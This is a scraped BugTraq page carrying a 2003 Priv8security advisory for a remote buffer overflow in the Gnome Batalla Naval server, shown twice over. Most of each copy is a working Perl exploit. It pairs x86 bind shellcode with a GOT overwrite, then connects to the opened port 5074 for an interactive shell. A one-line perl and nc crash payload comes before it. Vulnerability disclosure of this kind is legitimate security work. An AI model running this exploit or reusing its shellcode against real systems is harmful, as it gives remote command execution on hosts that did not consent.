Threat level definition
Search:
Home
Bugtraq
Vulnerabilities
Mailing Lists
Jobs
Tools
Beta Programs
News
Infocus
Foundations
Microsoft
Unix
IDS
Incidents
Virus
Pen-Test
Firewalls
Columnists
Mailing Lists
Newsletters
Bugtraq
Focus on IDS
Focus on Linux
Focus on Microsoft
Forensics
Pen-test
Security Basics
Vuln Dev
Vulnerabilities
Jobs
Job Opportunities
Resumes
Job Seekers
Employers
Tools
RSS
News
Vulns
Security Research
BugTraq
Back to list
|
Post reply
[Priv8security Advisory] Batalla Naval remote overflow
May 26 2003 07:41PM
wsxz (wsxz terra com br)
Priv8security advisory: 1
-----------------------------------------------------------------------
Product: Gnome Batalla Naval
Version: 1.0.4 (and probably earlier versions)
Vendor: http://batnav.sourceforge.net/
Problem: Remote Buffer overflow
Author: Wsxz (wsxz (at) priv8security (dot) com [email concealed])
-----------------------------------------------------------------------
I - About:
----------
From vendor site: Batalla Naval is a networked, multiplayer battleship
game. It has robots, and support for GGZ Gaming Zone and for IPv6.
II - Problem:
-------------
When a user starts gbnserver, remote players can crash the server by
sending a long string.
(perl -e 'print "A" x 500 . "\xdc\xf8\x04\x08" . "\x0f\xff\xff\xbf" x 20
. "\r\n"';cat) | nc localhost 1995
gdb output.
0x405584f7 in poll () from /lib/i686/libc.so.6
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0xbfffff7a in ?? ()
This string will cause gbnserver to crash and making it possible to users
execute commands under uid of user that started the server.
III - Fix:
---------
No fix at the moment.
IV - Credit:
-----------
Bug found by wsxz, any questions mail me at wsxz (at) priv8security (dot) com [email concealed]
Visit http://www.priv8security.com
Sorry, for my poor english.
V - Exploit (Proof of Concept):
-------------------------------
Exploit url http://releases.priv8security.org/priv8gbn.pl
---cut here----
#!/usr/bin/perl
# Priv8security.com remote exploit for Gnome Batalla Naval Server v1.0.4
#
# Game url http://batnav.sourceforge.net/
# Tested against Mandrake 9.0
#
# [wsxz@localhost buffer]$ perl priv8gbn.pl 127.0.0.1
# Connected!
# [+] Using ret address: 0xbffff3a2
# [+] Using got address: 0x804f8dc
# [+] Sending stuff...
# [+] Done ;pPPp
# [?] Now lets see if we got a shell...
# [+] Enjoy your stay on this server =)
# Linux wsxz.box 2.4.21-0.13mdk #1 Fri Mar 14 15:08:06 EST 2003
i686 unknown unknown GNU/Linux
# uid=503(wsxz) gid=503(wsxz) groups=503(wsxz)
#
use IO::Socket;
if (@ARGV < 1 || @ARGV > 3) {
print "-= Priv8security.com remote gbatnav-1.0.4 server on linux =-\n";
print "Usage: perl $0 <host> <port=1995> <offset=100>\n";
exit;
}
if (@ARGV >= 2) {
$port = $ARGV[1];
$offset = $ARGV[2];
} else {
$port = 1995;
$offset = 0;
}
$shellcode = #bind shellcode port 5074 by s0t4ipv6 (at) shellcode.com (dot) ar [email concealed]
"\x31\xc0\x50\x40\x89\xc3\x50\x40\x50\x89\xe1\xb0\x66".
"\xcd\x80\x31\xd2\x52\x66\x68\x13\xd2\x43\x66\x53\x89\xe1".
"\x6a\x10\x51\x50\x89\xe1\xb0\x66\xcd\x80\x40\x89\x44\x24\x04".
"\x43\x43\xb0\x66\xcd\x80\x83\xc4\x0c\x52\x52\x43\xb0\x66".
"\xcd\x80\x93\x89\xd1\xb0\x3f\xcd\x80\x41\x80\xf9\x03\x75\xf6".
"\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53".
"\x89\xe1\xb0\x0b\xcd\x80";
$ret = 0xbffff3a2; # ret mdk 9.0
$gotaddr = 0x0804f8dc; #objdump -R ./gbnserver | grep strcpy
$new_ret = pack('l', ($ret + $offset));
$new_got = pack('l', ($gotaddr));
$buffer .= "\x90" x (500 - length($shellcode));
$buffer .= $shellcode;
$buffer .= $new_got;
$buffer .= $new_ret x 20;
$f = IO::Socket::INET->new(Proto=>"tcp",
PeerHost=>$ARGV[0],PeerPort=>$port)
or die "Cant connect to server or port...\n";
print "Connected!\n";
print "[+] Using ret address: 0x", sprintf('%lx',($ret)), "\n";
print "[+] Using got address: 0x", sprintf('%lx',($gotaddr)), "\n";
print "[+] Sending stuff...\n";
print $f "$buffer\r\n\r\n";
print "[+] Done ;pPPp\n";
print "[?] Now lets see if we got a shell...\n";
close($f);
$handle = IO::Socket::INET->new(Proto=>"tcp",
PeerHost=>$ARGV[0],PeerPort=>5074,Type=>SOCK_STREAM,Reuse=>1)
or die "[-] No luck, try next time ok ...\n";
print "[+] Enjoy your stay on this server =)\n";
$handle->autoflush(1);
print $handle "uname -a;id\n";
# split the program into two processes, identical twins
die "cant fork: $!" unless defined($kidpid = fork());
# the if{} block runs only in the parent process
if ($kidpid) {
# copy the socket to standard output
while (defined ($line = <$handle>)) {
print STDOUT $line;
}
kill("TERM", $kidpid); # send SIGTERM to child
}
# the else{} block runs only in the child process
else {
# copy standard input to the socket
while (defined ($line = <STDIN>)) {
print $handle $line;
}
}
---cut here-----
[ reply ]
Privacy Statement
Copyright 2009, SecurityFocus
-----------------------------------------------------------------------
Product: Gnome Batalla Naval
Version: 1.0.4 (and probably earlier versions)
Vendor: http://batnav.sourceforge.net/
Problem: Remote Buffer overflow
Author: Wsxz (wsxz (at) priv8security (dot) com [email concealed])
-----------------------------------------------------------------------
I - About:
----------
From vendor site: Batalla Naval is a networked, multiplayer battleship
game. It has robots, and support for GGZ Gaming Zone and for IPv6.
II - Problem:
-------------
When a user starts gbnserver, remote players can crash the server by
sending a long string.
(perl -e 'print "A" x 500 . "\xdc\xf8\x04\x08" . "\x0f\xff\xff\xbf" x 20
. "\r\n"';cat) | nc localhost 1995
gdb output.
0x405584f7 in poll () from /lib/i686/libc.so.6
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0xbfffff7a in ?? ()
This string will cause gbnserver to crash and making it possible to users
execute commands under uid of user that started the server.
III - Fix:
---------
No fix at the moment.
IV - Credit:
-----------
Bug found by wsxz, any questions mail me at wsxz (at) priv8security (dot) com [email concealed]
Visit http://www.priv8security.com
Sorry, for my poor english.
V - Exploit (Proof of Concept):
-------------------------------
Exploit url http://releases.priv8security.org/priv8gbn.pl
---cut here----
#!/usr/bin/perl
# Priv8security.com remote exploit for Gnome Batalla Naval Server v1.0.4
#
# Game url http://batnav.sourceforge.net/
# Tested against Mandrake 9.0
#
# [wsxz@localhost buffer]$ perl priv8gbn.pl 127.0.0.1
# Connected!
# [+] Using ret address: 0xbffff3a2
# [+] Using got address: 0x804f8dc
# [+] Sending stuff...
# [+] Done ;pPPp
# [?] Now lets see if we got a shell...
# [+] Enjoy your stay on this server =)
# Linux wsxz.box 2.4.21-0.13mdk #1 Fri Mar 14 15:08:06 EST 2003
i686 unknown unknown GNU/Linux
# uid=503(wsxz) gid=503(wsxz) groups=503(wsxz)
#
use IO::Socket;
if (@ARGV < 1 || @ARGV > 3) {
print "-= Priv8security.com remote gbatnav-1.0.4 server on linux =-\n";
print "Usage: perl $0 <host> <port=1995> <offset=100>\n";
exit;
}
if (@ARGV >= 2) {
$port = $ARGV[1];
$offset = $ARGV[2];
} else {
$port = 1995;
$offset = 0;
}
$shellcode = #bind shellcode port 5074 by s0t4ipv6 (at) shellcode.com (dot) ar [email concealed]
"\x31\xc0\x50\x40\x89\xc3\x50\x40\x50\x89\xe1\xb0\x66".
"\xcd\x80\x31\xd2\x52\x66\x68\x13\xd2\x43\x66\x53\x89\xe1".
"\x6a\x10\x51\x50\x89\xe1\xb0\x66\xcd\x80\x40\x89\x44\x24\x04".
"\x43\x43\xb0\x66\xcd\x80\x83\xc4\x0c\x52\x52\x43\xb0\x66".
"\xcd\x80\x93\x89\xd1\xb0\x3f\xcd\x80\x41\x80\xf9\x03\x75\xf6".
"\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53".
"\x89\xe1\xb0\x0b\xcd\x80";
$ret = 0xbffff3a2; # ret mdk 9.0
$gotaddr = 0x0804f8dc; #objdump -R ./gbnserver | grep strcpy
$new_ret = pack('l', ($ret + $offset));
$new_got = pack('l', ($gotaddr));
$buffer .= "\x90" x (500 - length($shellcode));
$buffer .= $shellcode;
$buffer .= $new_got;
$buffer .= $new_ret x 20;
$f = IO::Socket::INET->new(Proto=>"tcp",
PeerHost=>$ARGV[0],PeerPort=>$port)
or die "Cant connect to server or port...\n";
print "Connected!\n";
print "[+] Using ret address: 0x", sprintf('%lx',($ret)), "\n";
print "[+] Using got address: 0x", sprintf('%lx',($gotaddr)), "\n";
print "[+] Sending stuff...\n";
print $f "$buffer\r\n\r\n";
print "[+] Done ;pPPp\n";
print "[?] Now lets see if we got a shell...\n";
close($f);
$handle = IO::Socket::INET->new(Proto=>"tcp",
PeerHost=>$ARGV[0],PeerPort=>5074,Type=>SOCK_STREAM,Reuse=>1)
or die "[-] No luck, try next time ok ...\n";
print "[+] Enjoy your stay on this server =)\n";
$handle->autoflush(1);
print $handle "uname -a;id\n";
# split the program into two processes, identical twins
die "cant fork: $!" unless defined($kidpid = fork());
# the if{} block runs only in the parent process
if ($kidpid) {
# copy the socket to standard output
while (defined ($line = <$handle>)) {
print STDOUT $line;
}
kill("TERM", $kidpid); # send SIGTERM to child
}
# the else{} block runs only in the child process
else {
# copy standard input to the socket
while (defined ($line = <STDIN>)) {
print $handle $line;
}
}
---cut here-----
[ reply ]